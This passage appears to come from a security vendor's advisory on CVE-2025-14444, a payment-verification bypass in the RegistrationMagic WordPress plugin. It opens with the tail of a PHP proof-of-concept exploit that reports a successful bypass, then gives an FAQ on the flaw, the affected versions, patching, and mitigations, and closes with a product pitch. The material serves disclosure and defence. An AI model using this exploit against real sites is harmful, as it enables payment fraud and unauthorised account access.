curl_close($ch);

// Parse and display results
if ($response !== false) {
    $json_response = json_decode($response, true);
    if ($json_response && isset($json_response['success']) && $json_response['success'] === true) {
        echo "[SUCCESS] Payment bypass successful!n";
        echo "Response: " . print_r($json_response, true) . "n";
        echo "User ID $user_id should now be activated without payment.n";
    } else {
        echo "[FAILED] Exploit unsuccessful.n";
        echo "HTTP Code: $http_coden";
        echo "Response: $responsen";
    }
} else {
    echo "[ERROR] Request failed.n";
}

?>

Frequently Asked Questions

What is CVE-2025-14444?
Understanding the vulnerability
CVE-2025-14444 is a medium severity vulnerability in the RegistrationMagic plugin for WordPress, allowing unauthenticated attackers to bypass payment verification. It occurs due to insufficient validation of payment status in the ‘process_paypal_sdk_payment’ function, enabling attackers to activate user accounts without completing real payments.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability allows attackers to send manipulated POST requests to the plugin’s AJAX endpoint, specifying a ‘Completed’ payment status. This triggers the activation of user accounts without actual payment confirmation from PayPal, effectively bypassing the plugin’s payment system.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the RegistrationMagic plugin version 6.0.6.9 or earlier is affected. Administrators should check their plugin version against the patched version, which is 6.0.7.0 or later, to determine if they are at risk.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the RegistrationMagic plugin installed. If it is version 6.0.6.9 or earlier, your site is at risk. Additionally, review your site’s logs for any unauthorized account activations that may indicate exploitation.
How can I fix this vulnerability?
Applying the necessary patch
The vulnerability can be fixed by updating the RegistrationMagic plugin to version 6.0.7.0 or later, where the issue has been addressed. Ensure that you also configure the new PayPal Secret Key in the plugin settings to enable proper server-side payment validation.
What does the CVSS score of 5.3 indicate?
Understanding severity levels
A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the vulnerability is not the most critical, it poses a significant risk that could lead to unauthorized access and potential revenue loss if exploited.
What are the practical risks of this vulnerability?
Potential impacts on your site
Exploitation of this vulnerability allows attackers to create user accounts without payment, granting them access to premium content or features. This could lead to financial losses for site owners and unauthorized access to restricted areas, undermining the integrity of the site.
How does the proof of concept demonstrate the issue?
Technical demonstration of exploitation
The proof of concept illustrates how an attacker can craft a malicious request to the vulnerable endpoint, using client-controlled parameters to bypass payment verification. It shows the specific payload structure required to exploit the vulnerability and activate a user account without a legitimate payment.
What additional security measures should I consider?
Enhancing overall site security
In addition to patching the vulnerability, consider implementing security measures such as regular plugin updates, using a web application firewall, and monitoring user activities for any suspicious behavior. Regular security audits can also help identify and mitigate risks.
Is it safe to continue using the plugin after patching?
Evaluating ongoing use
After applying the patch and properly configuring the plugin, it is generally safe to continue using RegistrationMagic. However, remain vigilant for any future updates and security advisories to ensure ongoing protection against new vulnerabilities.
How can I report further issues with the plugin?
Contacting support and developers
If you encounter any further issues or vulnerabilities with the RegistrationMagic plugin, it is advisable to contact the plugin developers directly through their support channels. Providing detailed information about the issue can assist them in addressing it promptly.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations